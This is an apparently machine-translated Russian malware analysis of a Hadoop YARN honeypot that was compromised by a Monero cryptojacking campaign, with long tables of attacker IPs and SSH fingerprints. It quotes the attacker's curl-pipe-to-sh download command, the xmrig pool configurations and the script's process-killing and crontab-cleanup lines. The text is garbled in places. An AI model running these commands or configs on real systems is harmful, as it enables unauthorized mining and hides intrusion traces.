Кибербезопасность (для инсайдеров): анализ угрозы по системам Hadoop и не только ...

(Ди Мол)
06/06/18

УВЕДОМЛЕНИЕ ДЛЯ ЧИТАТЕЛЕЙ: ДАННАЯ СТАТЬЯ ПРЕДНАЗНАЧЕНА ДЛЯ ПРОФЕССИОНАЛОВ КИБЕРБЕЗОПАСНОСТИ.

НЕ ВОССТАНОВИТЕ ОПУБЛИКОВАННЫЕ ССЫЛКИ!

 

Вы не понимаете сложность определенных предметов, если не когда вы сталкиваетесь, и, как правило, слишком поздно.

Чтобы попытаться заставить людей понять, что такое «кибер», эти последние несколько ночей я поставил на компьютер, и в образовательных целях я создал среду HDFS1 не защищены, чтобы понять, что может произойти в случае установки и настройки среды, не должным образом «затвердевшей» или контролируемой, или наиболее распространенного случая установок, выполняемых неквалифицированным или не особо тщательным техническим персоналом.

Сообщается, что существует проблема безопасности с системой управления ресурсами Hadoop Yarn (несанкционированный доступ в API REST2), с помощью которого вы можете удаленно выполнять произвольный код. Как только инфраструктура была создана, я просто ждал развития событий. Через неделю я обнаружил, что созданная инфраструктура была атакована и скомпрометирована.

Затем я приступил к анализу одного из компромиссов и предоставит советы и решения по безопасности для решения этой проблемы.

Выбранный случай является случаем добыча di criptocurrency

Для начала давайте попробуем понять что-то еще об инфраструктуре, используемой как "соблазн3».

Hadoop представляет собой распределенную инфраструктуру системы, разработанную Apache Foundation, единой платформой управления ресурсами для систем hadoop, основная роль которой заключается в достижении единого управления и планирования ресурсов кластера (обычно используется для управления данными, такими как виды Файловая система распространяемый). рамки Расчет MapReduce может быть выполнен как прикладная программа. Выше - система YARN, управление ресурсами осуществляется через YARN. Проще говоря, пользователь может отправлять определенные прикладные программы в YARN для выполнения, которые могут включать в себя выполнение их системных команд.

YARN предоставляет API REST, которые по умолчанию открыты на портах 8088 и 8090, поэтому любой пользователь через API может выполнять отправку действий и других операций в прямом режиме. Если они настроены неправильно, API-интерфейсы REST будут открыты в общедоступной сети (например, в Интернете, если вы решите использовать кластер HDFS на облако) и позволит несанкционированный доступ к созданной системе. В конечном счете, поэтому плохая конфигурация гарантирует, что любой злоумышленник может использовать инфраструктуру для выполнения удаленных команд, чтобы выполнять операции добыча4 или другие вредоносные действия в системе.

Почему такая деятельность очень тонкая?

Поскольку трудно вставить системы безопасности в кластеры HDFS или использовать системы для включения проверки подлинности Kerberos, предотвращения анонимного доступа (обновления версий) или проверки Мониторинг это связано с тем, что эти структуры рождаются, чтобы максимизировать производительность системы, используемой для запуска запрос ed аналитика уже сам по себе дорогой с вычислительной точки зрения.

Обнаружены проступки злонамеренной деятельности

  1. Анализ вторжений

На машине, используемой в качестве приманки, она была установлена ​​и настроена в режиме Hadoop YARN по умолчанию, это само по себе создает проблему безопасности несанкционированного доступа к системе. L 'нарушитель напрямую использует API REST, открытый на порт 8088, после гусеничный5 конкретно определяет набор открытых дверей, предварительно настроенных исполнителем. На этом этапенарушитель может отправлять исполняемые команды для загрузки и выполнения скрипта6 .sh на сервере (приложен 1 весь найденный скрипт, cr.sh). более скачать они впоследствии начнут процесс добыча.

Весь процесс относительно прост и хорошо структурирован, и вы можете увидеть, прочитав сценарий, что ничего не остается случайным, например, некоторые проверки, которые выполняются на сервер Гость Hadoop.

Команда, найденная и выполненная, интересна:

exec / bin / bash -c "curl 185.222.210.59/cr.sh | sh & disown"

Я останавливаюсь на этой команде, чтобы выделить два очень важных аспекта, которые являются IP-адресом, с которого загружается скрипт, и некоторыми действиями, которые служат для маскировки вредоносных действий7.

Если мы продолжим анализ кода внутри скрипта cr.sh, то легко заметить, что автор этого вопроса обратил особое внимание на устранение следов выполненных действий.8.

На этом этапе, в общем, можно сказать, что весь скрипт очень подробно, и кажется, что каждая функция вложена и вызвана, многие файлы задействованы во всем процессе, поэтому мы можем сообщить об основных шагах в соответствии со следующей моделью:

  1. Очистка связанных процессов, файлов и действий crontab;

  2. Судите и загрузите программу добыча, одновременно проверьте значение MD5, в дополнение к проверенному серверу также используйте https: // transfer.sh для предоставления скачать резервное копирование;

  3. Добавляет активность выполнения скачать из скрипт в кронтабе.

Основными показателями, вытекающими из анализа, являются следующие:

  • 185.222.210.59;

  • cr.sh

  • MD5 check c8c1f2da51fbd0aea60e11a81236c9dc | 5110222de7330a371c83af67d46c4242

  • http:// 185.222.210.59/re.php

  • xmrig_64 или xmrig_32

Мы проверим с циклом OSINF9 индикаторы выше.

 

  1. 185.222.210.59

Мы пытаемся проверить происхождение этого IP-адреса. На следующем рисунке показаны следующие основные поля:

На некоторых форумах10 производителей / компаний для выпуска платформ на основе HDFS, IP-адрес и точная строка, найденная и в нашем скрипте, сообщаются, запрашивая объяснения. В некоторых случаях он спрашивает, является ли это стандартной конфигурацией. Все благодаря некоторым администраторам HDFS, которые выполняют ручные и апериодические проверки, нет автоматизма.

Перейдя к проверке работы сервера, вы получите следующее:

Основная информация



OS

Debian

протоколы

80 / HTTP и 22 / SSH

  • 80 / HTTP



GET /

сервер

Apache httpd 2.4.10

Строка состояния

200 ОК

Название страницы

Страница Apache2 Debian по умолчанию: она работает

GET /

  • 22 / SSH



SSHv2 Рукопожатие

сервер

OpenSSH 6.7p1

баннер

SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3

Главный ключ

Алгоритм

ECDSA-sha2-nistp256

Отпечаток пальца

5a5c81f8dbc3e3d9fc57557691912a75b3be0d42ea5b30a2e7f1e584cffc5f40

Согласованный алгоритм

Обмен ключами

curve25519- sha256 @ libssh .org

Симметричный шифр

aes128-ctr | aes128-СУУ

MAC

hmac-sha2-256 | HMAC-sha2-256

Также было проверено, что существует открытый порт 111, соответствующий службе portmap. Поэтому со стороны сервер является Portmapper прослушивание порта 111 (Portmapper), со стороны клиент существует ряд программ, которые для любой службы RPC11, сначала необходимо связаться с Portmapper удаленный, который предоставляет им информацию, необходимую для установления соединения с демон компетентны. Возможная уязвимость в сервисе также может быть проверена, но это не является объектом исследования и аналитической деятельности.

Итак сервер в вопросе «подключен» и, вероятно, поддерживается через порт 22 с протоколом ssh, что гарантирует зашифрованное соединение. Из поля 22.ssh.v2.server_host_key.fingerprint_sha256, т. е. из отпечаток пальца из ssh сервера, поиск показывает, что других нет.

Сообщается также, что в 80.http.get.headers.last_modified показана дата Wed, 16 May 2018 14: 58: 53 GMT

Il сервер принадлежит адресной доступности компании PRISM BUSINESS SERVICES LTD, которая с основного сайта http: // www. prismbusiness.co.uk/about-us/, похоже, имеет отношение не к деятельности, связанной с техническим сектором ИКТ, а к другим областям. Если у них есть активные серверы в контексте облако, возможно, сконфигурированные и / или иным образом управляемые при необходимости, могут не знать о их текущем использовании.

Отображается вся сеть их доступности:

На анализируемом IP-адресе нет разрешения DNS.

  1. cr.sh

Lo скрипт cr.sh, который был проанализирован, имеет следующее MD5 48e79f8de26fa56d955a28c2de493132, однако, нет никаких признаков индексации в Интернете.

 

  1. MD5 check c8c1f2da51fbd0aea60e11a81236c9dc | 5110222de7330a371c83af67d46c4242

Сообщается, что MD5 соответствует файлам, загруженным во время выполнения скрипта, и показаны в следующей таблице:



Имя файла

MD5

xmrig_64

c8c1f2da51fbd0aea60e11a81236c9dc

xmrig_32

5110222de7330a371c83af67d46c4242

Файлы, показанные выше, являются ядром выполнения Доказательство работы (PoW) одного криптовалюте хорошо известно, это действительно Моннеро.

  1. https://  transfer.sh/ixQBE/zzz

Интересным является использование transfer.sh, который оказывается одним Тактика, методы и процедуры (ТТП) поведения этого нарушитель, который получает резервную копию для загрузки исполняемых файлов добыча данных.

Фактически, было обнаружено, что transfer.sh - это не что иное, как быстрый и простой обмен файлами из командной строки. Этот код содержит сервер со всем необходимым для создания собственного экземпляра ", все это доступно для загрузки на https: // github.com/dutchcoders/transfer.sh и на веб-сайте https: // transfer.sh/, где есть объяснения использования с вариантом использования, чтобы его можно было легко интегрировать и настраивать. Процесс повторное использование кода в настоящее время широко используется как в контексте Киберпреступность в гораздо более широких контекстах, чем Cyber ​​Espionage o Cyber ​​Intelligenge.

  1. http://  185.222.210.59/g.php

Сегодня страница 02 June 2018 отвечает на IP-адрес 95.142.40.81, тогда как на момент открытия скрипт отображаемый IP-адрес был 46.30.42.162, Оба имеют одинаковое поведение, введенное как переменная f1, после выполнения проверок с помощью getconf LONG_BIT загружаются исполняемые файлы xmrig_64 или xmrig_32. Очевидно, что это позволяет, если обнаружено злоумышленное первое IP-адрес, но не IP-адрес управления и управления 185.222.210.59, сделать ненужными некоторые элементы управления безопасностью, такие как черный список da брандмауэр, неграмотная классификация Websense o предупреждение SIEM доступны для SOC.

Посмотрим, можем ли мы извлечь что-то из двух IP-адресов:

46.30.42.162

Адрес приводит к доступности Eurobyte VPS, и адресация содержит класс адресов байт 24 при наличии этого хостинга, который имеет российское происхождение.

Это тоже сервер, приводит к открытию портов 22 и 80 с операционной системой Debian.

Ниже приведены найденные детали:

Основная информация



OS

Debian

Cеть

MCHOST - AS (RU)

Маршрутизация

46.30.42.0 / 24 через AS7018, AS3356, AS35415, AS48282

протоколы

80 / HTTP и 22 / SSH

  • 80 / HTTP



GET /

сервер

Apache httpd 2.4.10

Строка состояния

200 ОК

Название страницы

Страница Apache2 Debian по умолчанию: она работает

GET /

  • 22 / SSH



SSHv2 Рукопожатие

сервер

OpenSSH 6.7p1

баннер

SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3

Главный ключ

Алгоритм

ECDSA-sha2-nistp256

Отпечаток пальца

3e88599d935de492c07f93e313201aa340b7ff0a5f66a330a0c5ab660cf95fad

Согласованный алгоритм

Обмен ключами

curve25519- sha256 @ libssh .org

Симметричный шифр

aes128-ctr | aes128-СУУ

MAC

hmac-sha2-256 | HMAC-sha2-256

Отмечается, что поиск, основанный на отпечатке ключа хоста, показывает, что есть другие серверы 41 с одной и той же сигнатурой. Из этих серверов 41 даже новый IP-адрес 95.142.40.81 находится в доступности злоумышленника.

С этими данными мы можем предположить, что мы нашли один бассейн инфраструктура первого уровня этого сингла нарушитель или группа Cyber ​​Crime.

Сообщается о адресации и любой информации, полезной для последующих действий:

 



95.142.40.74 (vz232259.eurodir.ru)

AS (48282) Россия
Debian 80 / http

Месторасположение: Россия

185.154.53.249 (vz232259.eurodir.ru)

AS (48282) Россия
Debian 143 / imap, 587 / smtp, 80 / http

Месторасположение: Россия

95.142.40.89 (vz229526.eurodir.ru)

AS (48282) Россия
Debian 80 / http

Месторасположение: Россия

95.142.40.190 (vz232259.eurodir.ru)

AS (48282) Россия
Debian 80 / http

Месторасположение: Россия

95.142.40.189 (vz232259.eurodir.ru)

AS (48282) Россия
Debian 80 / http

Месторасположение: Россия

46.30.47.115 (vz227413.eurodir.ru)

AS (48282) Россия
Debian 22 / ssh, 587 / smtp

Месторасположение: Россия

95.142.39.241 (shimshim.info)

AS (48282) Россия
Debian 3306 / mysql, 8888 / http

Месторасположение: Россия

база данных mysql

95.142.40.188 (vz232259.eurodir.ru)

AS (48282) Россия
Debian 80 / http

Месторасположение: Россия

46.30.41.207 (vz230806.eurodir.ru)

AS (48282) Россия
Debian 587 / smtp

Месторасположение: Россия

46.30.41.182 (vz230501.eurodir.ru)

AS (48282) Россия
Debian 443 / https, 587 / smtp
HY

Месторасположение: Россия

95.142.39.251 (vz232259.eurodir.ru)

AS (48282) Россия
Debian 143 / imap, 443 / https, 80 / http
* .vps.eurobyte.ru

Месторасположение: Россия

185.154.53.67 (vz232259.eurodir.ru)

AS (48282) Россия
Debian 110 / pop3, 143 / imap, 25 / smtp, 80 / http

Месторасположение: Россия

185.154.53.65 (profshinservice.ru)

AS (48282) Россия
Debian 443 / https, 80 / http
profshinservice.ru, www. profshinservice.ru

Месторасположение: Россия

46.30.45.91 (vz220153.eurodir.ru)

AS (48282) Россия
Debian 443 / https, 53 / dns
celsiumoftesla.tk, www. celsiumoftesla.tk

Месторасположение: Россия

185.154.53.46 (server.badstudio.ru)

AS (48282) Россия
Debian 443 / https, 587 / smtp, 80 / http
403 Запрещено apple-remont24.ru, www. apple-remont24.ru

Месторасположение: Россия

46.30.41.80 (track.dev)

AS (48282) Россия
Debian 80 / http, 8080 / http
Документ

Месторасположение: Россия

46.30.45.152 (vz230274.eurodir.ru)

AS (48282) Россия
Debian 587 / smtp, 80 / http
Кошелек TREZOR

Месторасположение: Россия

185.154.53.72 (vz231895.eurodir.ru)

AS (48282) Россия
Debian 110 / pop3, 25 / smtp, 443 / https, 587 / smtp
vps1.dev.eurobyte.ru

Месторасположение: Россия

185.154.53.137 (vz224405.eurodir.ru)

AS (48282) Россия
Debian 110 / pop3, 143 / imap, 21 / ftp, 443 / https, 53 / dns, 80 / http, 993 / imaps, 995 / pop3s
На реконструкции ... www. undergod.ru, undergod.ru

Месторасположение: Россия

95.142.39.151 (donotopen.ru)

AS (48282) Россия
Debian 110 / pop3, 143 / IMAP, 21 / FTP, 3306 / MySQL, 53 / DNS, 80 / HTTP, 993 / IMAPS, 995 / pop3s
donotopen.ru - Скоро

Месторасположение: Россия

база данных mysql

185.154.52.117 (vz230686.eurodir.ru)

AS (48282) Россия
Debian 80 / http
Главная страница

Месторасположение: Россия

46.30.47.157 (vz228859.eurodir.ru)

AS (48282) Россия
Debian 587 / smtp, 80 / http
Страница Apache2 Debian по умолчанию: она работает

Месторасположение: Россия

95.142.40.83 (vz228857.eurodir.ru)

AS (48282) Россия
Debian 80 / http
Страница Apache2 Debian по умолчанию: она работает

Месторасположение: Россия

95.142.40.86 (kolos1952.ru)

AS (48282) Россия
Debian 110 / pop3, 143 / IMAP, 21 / FTP, 3306 / MySQL, 53 / DNS, 80 / HTTP, 993 / IMAPS, 995 / pop3s
4 300 ye

Месторасположение: Россия

база данных mysql

95.142.40.81 (vz228855.eurodir.ru)

AS (48282) Россия
Debian 80 / http
Страница Apache2 Debian по умолчанию: она работает

Месторасположение: Россия

46.30.42.162 (server.com)

AS (48282) Россия
Debian 80 / http
Страница Apache2 Debian по умолчанию: она работает

Месторасположение: Россия

95.142.40.82 (vz228856.eurodir.ru)

AS (48282) Россия
Debian 80 / http
Страница Apache2 Debian по умолчанию: она работает

Месторасположение: Россия

46.30.43.128 (vz228757.eurodir.ru)

AS (48282) Россия
Debian 80 / http
Страница Apache2 Debian по умолчанию: она работает

Месторасположение: Россия

185.154.52.236 (supportt.ru)

AS (48282) Россия
Debian 110 / pop3, 143 / IMAP, 21 / FTP, 3306 / MySQL, 53 / DNS, 80 / HTTP, 993 / IMAPS, 995 / pop3s
4 300 ye

Месторасположение: Россия

база данных mysql

95.142.39.109 (vz228627.eurodir.ru)

AS (48282) Россия
Debian 80 / http
Страница Apache2 Debian по умолчанию: она работает

Месторасположение: Россия

95.142.40.44 (vz229990.eurodir.ru)

AS (48282) Россия
Debian 80 / http
Страница Apache2 Debian по умолчанию: она работает

Месторасположение: Россия

95.142.39.164 (vz232259.eurodir.ru)

AS (48282) Россия
Debian 143 / imap, 25 / smtp, 587 / smtp, 80 / http
Главная

Месторасположение: Россия

46.30.45.30 (shop.engine)

AS (48282) Россия
Debian 110 / pop3, 143 / imap, 21 / ftp, 53 / dns, 80 / http, 993 / imaps, 995 / pop3s
Начальный макет Интернет-магазина

Месторасположение: Россия

95.142.39.172 (hosting-by.wikhost.com)

AS (48282) Россия
Debian 110 / pop3, 143 / imap, 21 / ftp, 3306 / mysql, 443 / https, 53 / dns, 80 / http, 993 / imaps, 995 / pop3s
Хостинг: WikHost.com, wikhost.com, www. wikhost.com

Месторасположение: Россия

база данных mysql

185.154.52.161 (piar60.ru)

AS (48282) Россия
Debian 110 / pop3, 143 / IMAP, 21 / FTP, 3306 / MySQL, 53 / DNS, 80 / HTTP, 993 / IMAPS, 995 / pop3s
4 300 ye

Месторасположение: Россия

база данных mysql

95.142.40.87 (regiister.ru)

AS (48282) Россия
Debian 110 / pop3, 143 / IMAP, 21 / FTP, 3306 / MySQL, 53 / DNS, 80 / HTTP, 993 / IMAPS, 995 / pop3s
4 300 ye

Месторасположение: Россия

база данных mysql

95.142.40.88 (buled.ru)

AS (48282) Россия
Debian 110 / pop3, 143 / IMAP, 21 / FTP, 3306 / MySQL, 53 / DNS, 80 / HTTP, 993 / IMAPS, 995 / pop3s
4 300 ye

Месторасположение: Россия

база данных mysql

185.154.53.190 (vz228963.eurodir.ru)

AS (48282) Россия
Debian 110 / pop3, 143 / IMAP, 21 / FTP, 3306 / MySQL, 53 / DNS, 80 / HTTP, 993 / IMAPS, 995 / pop3s
Страница Apache2 Debian по умолчанию: она работает

Месторасположение: Россия

база данных mysql

46.30.41.51 (vz225213.eurodir.ru)

AS (48282) Россия
Debian 80 / http
Документ

Месторасположение: Россия

185.154.53.108 (vz224405.eurodir.ru)

AS (48282) Россия
Debian 110 / pop3, 143 / imap, 21 / ftp, 443 / https, 53 / dns, 80 / http, 993 / imaps, 995 / pop3s
Экомониторинг, системы мониторинга объектов - НПК МИР. Тел: +7 (812) 317-18-30 npkmir.ru, www. npkmir.ru

Месторасположение: Россия

185.154.52.181 (vz224405.eurodir.ru)

AS (48282) Россия
Debian 110 / pop3, 143 / IMAP, 21 / FTP, 443 / HTTPS, 53 / DNS, 587 / SMTP, 80 / HTTP, 993 / IMAPS, 995 / pop3s
Экомониторинг, системы мониторинга объектов - НПК МИР. Тел: +7 (812) 317-18-30 npkmir.ru, www. npkmir.ru

Месторасположение: Россия

Вместо этого метаданные, касающиеся анализа IP 41 выше:

Все найденные адреса, обратитесь к AS MCHOST-AS, RU:

1-th Street Frezernaiy, 2 / 1 XENUMX штрихи
109202 Москва
РОССИЯ ФЕДЕРАЦИИ

телефон: + 7 495 6738456
факс: + 7 495 6738456
e-mail: info (at) mchost (dot) ru

Сроки обслуживания: RU

  1. http://  185.222.210.59/w.conf

Сегодня:

{

«algo»: «криптонайт»,

«background»: true,

«colors»: false,

«повторяет»: 5,

«retry-pause»: 5,

«donate-level»: 1,

"syslog": false,

«log-file»: null,

«время печати»: 60,

«av»: 0,

«безопасный»: ложный,

«max-cpu-usage»: 95,

«cpu-priority»: 4,

"threads": null,

«пулы»: [

{

"url": "stratum + tcp: // 46.30.43.159: 80",

«пользователь»: «h»,

«pass»: «h»,

«keepalive»: правда,

«nicehash»: false,

«вариант»: -1

}

],

"api": {

«порт»: 0,

"access-token": null,

"worker-id": null

}

}

Во время открытия скрипт:

{

«algo»: «криптонайт»,

«background»: true,

«colors»: false,

«повторяет»: 5,

«retry-pause»: 5,

«donate-level»: 1,

"syslog": false,

«log-file»: null,

«время печати»: 60,

«av»: 0,

«безопасный»: ложный,

«max-cpu-usage»: 95,

«cpu-priority»: 4,

"threads": null,

«пулы»: [

{

"url": "stratum + tcp: // 179.60.146.10: 5556",

«пользователь»: «h»,

«pass»: «h»,

«keepalive»: правда,

«nicehash»: false,

«вариант»: -1

},

{

"url": "stratum + tcp: // 46.30.43.159: 80",

«пользователь»: «h»,

«pass»: «h»,

«keepalive»: правда,

«nicehash»: false,

«вариант»: -1

}

],

"api": {

«порт»: 0,

"access-token": null,

"worker-id": null

}

}

Важно подчеркнуть, как файл conf определяет два важных показателя для этапа анализа (мы также можем определить три):

  • stratum + tcp: // 46.30.43.159: 80 (общий для разных дат);

  • stratum + tcp: // 179.60.146.10: 5556 (только в первом поиске);

  • «algo»: «криптонайт»;

Давайте проанализируем первый IP-адрес 46.30.43.159, Этот IP-адрес в наличии Eurobyte VPS, русский, имеет PTR vz230703.eurodir.ru и является частью сети 46.30.43.0 / 24. PTR IP-адресов сеть, прилагаемый 1 показывает весь класс, у них есть что-то особенное. Я сообщаю в таблице ниже PTR со сходством без поля А, Я 41:



IP

PTR

46.30.43.13

vz94180.eurodir.ru

46.30.43.17

vz203045.eurodir.ru

46.30.43.21

vz206109.eurodir.ru

46.30.43.23

vz216100.eurodir.ru

46.30.43.24

vz174272.eurodir.ru

46.30.43.30

vz35015.eurodir.ru

46.30.43.57

vz78210.eurodir.ru

46.30.43.58

vz229754.eurodir.ru

46.30.43.61

vz35015.eurodir.ru

46.30.43.64

vz38207.eurodir.ru

46.30.43.66

vz86195.eurodir.ru

46.30.43.70

vz173527.eurodir.ru

46.30.43.77

vz174931.eurodir.ru

46.30.43.79

vz195563.eurodir.ru

46.30.43.82

vz197086.eurodir.ru

46.30.43.90

vz120816.eurodir.ru

46.30.43.93

vz173527.eurodir.ru

46.30.43.98

vz94065.eurodir.ru

46.30.43.101

vz216360.eurodir.ru

46.30.43.102

vz195005.eurodir.ru

46.30.43.123

vz212299.eurodir.ru

46.30.43.128

vz228757.eurodir.ru

46.30.43.130

vz168899.eurodir.ru

46.30.43.156

vz195735.eurodir.ru

46.30.43.159

vz230703.eurodir.ru

46.30.43.161

vz171964.eurodir.ru

46.30.43.166

vz123353.eurodir.ru

46.30.43.170

vz224733.eurodir.ru

46.30.43.172

vz226924.eurodir.ru

46.30.43.184

vz171966.eurodir.ru

46.30.43.186

vz162078.eurodir.ru

46.30.43.214

vz207073.eurodir.ru

46.30.43.219

vz110518.eurodir.ru

46.30.43.224

vz98980.eurodir.ru

46.30.43.226

vz100250.eurodir.ru

46.30.43.229

vz110562.eurodir.ru

46.30.43.232

vz228251.eurodir.ru

46.30.43.237

vz162078.eurodir.ru

46.30.43.244

vz207073.eurodir.ru

46.30.43.245

vz174272.eurodir.ru

46.30.43.246

vz157495.eurodir.ru

Также в этом случае менеджер может не знать, что некоторые из этих серверов под его доступностью используются для сторонних целей, однако их следует анализировать один за другим, чтобы найти дополнительные сходства.

Анализируя 179.60.146.10вместо этого мы имеем следующее:

ECDSA key fingerprint is SHA256:62Jyi3X1dEJRIH85kJ0Ee20aW+PEK5g976Xk3yGKVHQ

Результат порта 22, 111, 5555 открытый и это тоже сервер использует OpenSSHVersion: 6.7p1 Debian 5 + deb8u3

К сожалению, никаких других доказательств нет.

Cryptonight вместо этого, это сильный показатель того, что вы хотите сделать, как только вы нажмете цель, В частности, целью является подорвать блоки криптовалюте Моннеро, входя в цель в пределах бассейна dell'intruder, Выбор не случайный. Протокол Cryptonight Было изучено, что оно шахтер которые не имеют доступ к ASIC или кластеру очень дорогих видеокарт, но вы можете использовать классические процессоры ПК, ноутбуков или MiniPC.

Действительно, CryptoNight используется для добыча из тех монет, которые характеризуются протоколом CryptoNote. Это функция, строго связанная с памятью (жесткий хеш памяти), в этом случае к кеш-памяти третьего уровня для ЦП, поскольку она ориентирована на задержку, Это ограничение было введено для того, чтобы сделать CryptoNight неэффективным в таких системах, как GPU и FPGA, не оснащенные кэш-памятью и, следовательно, неблагоприятные для использования алгоритма.

Размеры блокнот от CryptoNight - около 2 МБ памяти для каждого экземпляра по следующим причинам:

  1. он может содержаться в кэшах L3 (на ядро) современных процессоров;

  2. внутренняя память мегабайт è уна неприемлемый размер для традиционного трубопровода ASIC;

  3. Графические процессоры могут запускать сотни нить но они имеют гораздо более низкую задержку, чем кеш L3 современных процессоров;

  4. значительное расширение блокнот потребует увеличения взаимодействия. Если узел потратил значительное количество времени на хэш блока, его можно было бы легко затопить с помощью механизма затопление ложных блоков, вызывающих DDoS.

модернизация

Именно в эти дни произошла модификация скрипт cr.sh, конфигурационных файлов и исполняемых файлов.

Загрузка исполняемых файлов на дату добыча он получается из IP-адреса 95.142.40.83, что привело к идентификации через отпечаток пальца ключа ssh, дополнительные IP-адреса, доступные длянарушитель.

В приведенной ниже таблице показаны данные 20 по IP-адресам 65, так как у вас нет возможности получить их все навалом (нехватка времени и учетной записи платный недоступен) с теми же ключами SSH и те же конфигурации.



95.142.39.233 vz231616.eurodir.ru

McHost.Ru

Добавлено в 2018-06-03 03: 44: 26 GMT Российская Федерация

SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4

Тип ключа: ssh-rsa

46.30.43.128 vz228757.eurodir.ru

EuroByte LLC

Добавлено в 2018-06-03 03: 35: 03 GMT Российская Федерация

SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4

Тип ключа: ssh-rsa

46.30.47.107 vz227413.eurodir.ru

EuroByte LLC

Добавлено в 2018-06-03 03: 15: 02 GMT Российская Федерация

SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4

Тип ключа: ssh-rsa

46.30.41.182 vz230501.eurodir.ru

EuroByte LLC

Добавлено в 2018-06-02 21: 01: 28 GMT Российская Федерация

SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4

Тип ключа: ssh-rsa

46.30.47.21 vz227411.eurodir.ru

Linux 3.x

EuroByte LLC

Добавлено в 2018-06-02 16: 48: 39 GMT Российская Федерация

SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4

Тип ключа: ssh-rsa

95.142.40.188 vz232259.eurodir.ru

McHost.Ru

Добавлено в 2018-06-02 12: 58: 55 GMT Российская Федерация

SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4

Тип ключа: ssh-rsa

46.30.45.30 shop.engine

EuroByte LLC

Добавлено в 2018-06-02 09: 45: 16 GMT Российская Федерация

SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4

Тип ключа: ssh-rsa

95.142.40.81 vz228855.eurodir.ru

McHost.Ru

Добавлено в 2018-06-02 07: 11: 32 GMT Российская Федерация

SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4

Тип ключа: ssh-rsa

185.154.53.137 vz224405.eurodir.ru

EuroByte LLC

Добавлено в 2018-06-02 07: 04: 48 GMT Российская Федерация

SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4

Тип ключа: ssh-rsa

46.30.47.82 vz227413.eurodir.ru

EuroByte LLC

Добавлено в 2018-06-02 04: 55: 14 GMT Российская Федерация

SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4

Тип ключа: ssh-rsa

185.154.53.67 vz232259.eurodir.ru

EuroByte LLC

Добавлено в 2018-06-02 03: 45: 39 GMT Российская Федерация

SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4

Тип ключа: ssh-rsa

95.142.40.87 regiister.ru

McHost.Ru

Добавлено в 2018-06-01 22: 04: 23 GMT Российская Федерация

SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4

Тип ключа: ssh-rsa

46.30.47.66 vz227407.eurodir.ru

EuroByte LLC

Добавлено в 2018-06-01 18: 17: 26 GMT Российская Федерация

SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4

Тип ключа: ssh-rsa

185.154.52.236 supportt.ru

EuroByte LLC

Добавлено в 2018-06-01 11: 27: 17 GMT Российская Федерация

SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4

Тип ключа: ssh-rsa

46.30.47.35 vz227411.eurodir.ru

Linux 3.x

EuroByte LLC

Добавлено в 2018-06-01 11: 07: 16 GMT Российская Федерация

SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4

Тип ключа: ssh-rsa

185.154.53.46 server.badstudio.ru

EuroByte LLC

Добавлено в 2018-06-01 07: 22: 23 GMT Российская Федерация

SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4

Тип ключа: ssh-rsa

95.142.40.89 vz229526.eurodir.ru

McHost.Ru

Добавлено в 2018-05-31 14: 07: 45 GMT Российская Федерация

SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4

Тип ключа: ssh-rsa

46.30.42.162 server.com

EuroByte LLC

Добавлено в 2018-05-31 12: 56: 26 GMT Российская Федерация

SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4

Тип ключа: ssh-rsa

95.142.39.102 vz222177.eurodir.ru

McHost.Ru

Добавлено в 2018-05-31 10: 05: 30 GMT Российская Федерация

SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4

Тип ключа: ssh-rsa

95.142.40.86 kolos1952.ru

McHost.Ru

Добавлено в 2018-05-31 09: 42: 31 GMT Российская Федерация

SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u4

Тип ключа: ssh-rsa

Вот несколько подробных графиков:

Кроме того, загружаемые файлы отображаются следующим образом:



Имя файла

MD5

xm64

183664ceb9c4d7179d5345249f1ee0c4

xm32

b00f4bbd82d2f5ec7c8152625684f853

В дополнение к вышесказанному, в скрипт, присутствуют следующие команды:

pkill -f logo4.jpg

pkill -f logo0.jpg

pkill -f logo9.jpg

pkill -f jvs

pkill -f javs

pkill -f 192.99.142.248

rm -rf / tmp / pscd *

rm -rf / var / tmp / pscd *

crontab -l | sed '/ 192.99.142.232 / d' | crontab -

crontab -l | sed '/ 192.99.142.226 / d' | crontab -

crontab -l | sed '/ 192.99.142.248 / d' | crontab -

crontab -l | sed '/ logo4 / d' | crontab -

crontab -l | sed '/ logo9 / d' | crontab -

crontab -l | sed '/ logo0 / d' | crontab -

Использование команды sed, которая не часто встречается в программировании, сразу же очевидна, поэтому она тоже может оказаться среди TTP, используемых враждебным актером.

Сед - один поток редактор, используемый для выполнения текстовых преобразований во входном потоке (файл или вход из конвейера); это способность sed фильтровать текст в конвейере, который отличает его определенным образом от других типов редакторов.

В этом контексте он используется для устранения любого следа от операций cron. Вероятно, в процессе анализа не известны действия по вторжению, поскольку они получены из прошлых действий, которые затем менялись, чтобы получить ожидаемое.

Выполнение анализа IP-адресов 192.99.142.232, 192.99.142.226, 192.99.142.248, мы получаем, что компанией (ISP) является OVH Hosting с местонахождением в Канаде.

